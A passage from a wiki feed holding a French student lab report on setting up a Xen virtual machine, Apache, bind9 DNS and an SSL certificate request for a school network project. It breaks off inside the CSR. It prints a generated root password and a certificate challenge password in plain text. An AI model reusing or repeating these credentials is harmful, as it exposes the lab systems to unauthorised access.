   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51139</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51139"/>
				<updated>2019-11-25T16:24:34Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Affectation du certificat sur Gandi.net */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
	&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
    $TTL 259200&lt;br /&gt;
    @IN SOA dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (&lt;br /&gt;
         21112019      ; Version&lt;br /&gt;
         7200    ; Refresh (2h)&lt;br /&gt;
         3600    ; Retry (1h)&lt;br /&gt;
         1209600 ; Expire (14j)&lt;br /&gt;
         7200    ; Minimum TTL (2h)&lt;br /&gt;
     @    IN NS  dns.ima2a5-rex4ever.site.    &amp;lt;= nom du dns ima2a5&lt;br /&gt;
     @    IN NS  ns6.gandi.net.               &amp;lt;= nom du dns de gandi&lt;br /&gt;
     dns  IN A   193.48.57.163                &amp;lt;= ip du dns ima2a5&lt;br /&gt;
     www  IN A   193.48.57.163                &amp;lt;= ip du site web&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
